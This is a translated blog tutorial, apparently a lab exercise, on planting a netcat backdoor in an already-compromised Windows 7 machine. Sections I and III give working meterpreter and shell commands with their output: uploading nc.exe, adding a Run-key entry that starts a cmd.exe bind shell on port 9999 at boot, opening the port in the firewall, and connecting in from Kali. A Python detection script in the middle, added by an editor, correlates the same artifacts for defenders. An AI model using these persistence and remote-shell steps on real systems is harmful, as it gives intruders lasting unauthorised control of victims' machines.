This article is for information-security study only. Comply with applicable laws and regulations; use for illegal purposes is strictly prohibited. Readers who perform any act that endangers network security bear the consequences themselves; the author takes no responsibility.
It is assumed that the target has already been compromised from Kali (see https://blog.csdn.net/mshxuyi/article/details/136377760).
I. Creating an NC backdoor from Kali
1. Copy nc.exe to the target
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
# output
[*] Uploading : /usr/share/windows-binaries/nc.exe -> c:\windows\system32\nc.exe
[*] Completed : /usr/share/windows-binaries/nc.exe -> c:\windows\system32\nc.exe
2. Start it at boot via the registry Run key
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v Netcat -d 'C:\windows\system32\nc.exe -l -d -p 9999 -e cmd.exe'
# output
Successfully set Netcat of REG_SZ.
# Note: with -l nc.exe exits as soon as the first connection closes, so this shell is available once per boot; -d detaches it from the console. The Windows build of nc also has -L, which re-listens after each connection.
3. Drop into a shell
meterpreter > shell
# output (the Chinese-locale Win7 banner prints as mojibake because the console is in code page 936 and meterpreter does not decode it; it is shown here in its English form, and chcp below fixes the encoding)
Process 1548 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# switch the console to UTF-8
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
4. Add a firewall rule that opens the listening port
C:\Windows\system32>netsh firewall add portopening TCP 9999 "Netcat" ENABLE ALL
# output (the legacy "netsh firewall" context still works on Win7 but is deprecated; the rule it creates is visible under "netsh advfirewall firewall")
netsh firewall add portopening TCP 9999 "Netcat" ENABLE ALL
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
Ok.
II. Reboot the Win7 target and check the result
1. Check the startup items
2. Check the firewall rules
3. Check the running processes
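The three checks above are the artifacts a defender looks at on the rebooted target. As an added example that is not part of the original article, the Python script below parses constructed (not captured) output of `reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"`, `netsh advfirewall firewall show rule name=all` and `netstat -ano -p tcp`, and correlates the Run value, the inbound allow rule and the listening socket into findings. The sample text, the second Run value, the second firewall rule and the PIDs are assumptions made for the example; only the Netcat value, the port 9999 and the rule name come from the article.

```python
import re

# Constructed sample of `reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"`
# after step 2 above (not a real capture; the VMware value is an assumed bystander).
RUN_KEY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    Netcat    REG_SZ    C:\windows\system32\nc.exe -l -d -p 9999 -e cmd.exe
"""

# Constructed sample of `netsh advfirewall firewall show rule name=all`; the legacy
# `netsh firewall add portopening` rule from step 4 shows up here as "Netcat".
FIREWALL_OUTPUT = """
Rule Name:                            Netcat
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             TCP
LocalPort:                            9999
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Protocol:                             UDP
LocalPort:                            Any
Action:                               Allow
"""

# Constructed sample of `netstat -ano -p tcp` (PIDs are assumed).
NETSTAT_OUTPUT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       704
  TCP    0.0.0.0:9999           0.0.0.0:0              LISTENING       1548
"""

# A Run-key command counts as a shell listener if it launches nc/nc64 or uses
# nc's -e switch to hand the connection to cmd.exe or powershell.
SHELL_LISTENER = re.compile(r"(?i)\bnc(?:64)?\.exe\b|\s-e\s+\S*(?:cmd\.exe|powershell)")


def parse_run_key(text):
    """Map each Run value name to its command line (REG_SZ / REG_EXPAND_SZ rows)."""
    entries = {}
    for line in text.splitlines():
        m = re.match(r"\s+(.+?)\s{2,}REG_(?:EXPAND_)?SZ\s+(.+)$", line)
        if m:
            entries[m.group(1)] = m.group(2).strip()
    return entries


def parse_firewall_rules(text):
    """Split netsh advfirewall output into one dict per rule, keyed by field name."""
    rules, current = [], None
    for line in text.splitlines():
        m = re.match(r"([A-Za-z ]+):\s*(.*)$", line)
        if not m:
            continue
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Rule Name":
            current = {key: value}
            rules.append(current)
        elif current is not None:
            current[key] = value
    return rules


def parse_listening_ports(text):
    """Map each TCP port in LISTENING state to the PID that owns it."""
    ports = {}
    for line in text.splitlines():
        m = re.match(r"\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s+(\d+)", line)
        if m:
            ports[int(m.group(1))] = int(m.group(2))
    return ports


def find_nc_backdoor(run_text, fw_text, netstat_text):
    """Correlate the three artifacts; return one finding string per hit."""
    findings = []
    rules = parse_firewall_rules(fw_text)
    listening = parse_listening_ports(netstat_text)
    for name, cmd in parse_run_key(run_text).items():
        if not SHELL_LISTENER.search(cmd):
            continue
        findings.append(f"Run value '{name}' starts a shell listener: {cmd}")
        port_m = re.search(r"-p\s+(\d+)", cmd)
        if not port_m:
            continue
        port = int(port_m.group(1))
        for rule in rules:
            if (rule.get("Direction") == "In" and rule.get("Action") == "Allow"
                    and rule.get("Protocol") == "TCP" and rule.get("LocalPort") == str(port)):
                findings.append(f"inbound firewall rule '{rule['Rule Name']}' allows TCP {port}")
        if port in listening:
            findings.append(f"TCP {port} is LISTENING (PID {listening[port]})")
    return findings


if __name__ == "__main__":
    for finding in find_nc_backdoor(RUN_KEY_OUTPUT, FIREWALL_OUTPUT, NETSTAT_OUTPUT):
        print(finding)
```

On a real host, redirect the three commands to files and pass their contents to `find_nc_backdoor`. The Run-key check alone already flags the persistence; the firewall and netstat checks confirm that the listener is both reachable and actually running after the reboot, which is what sections 1 to 3 above verify by hand.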
III. Verifying the backdoor
1. Connect to the target
┌──(root㉿Kali)-[~]
└─# nc -v 10.3.0.234 9999
# output (the banner is again the mis-decoded Chinese-locale banner, shown here in English)
10.3.0.234: inverse host lookup failed: Unknown host
(UNKNOWN) [10.3.0.234] 9999 (?) open
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
2. Check the hostname
C:\Windows\system32>hostname
# output
hostname
tomma-PC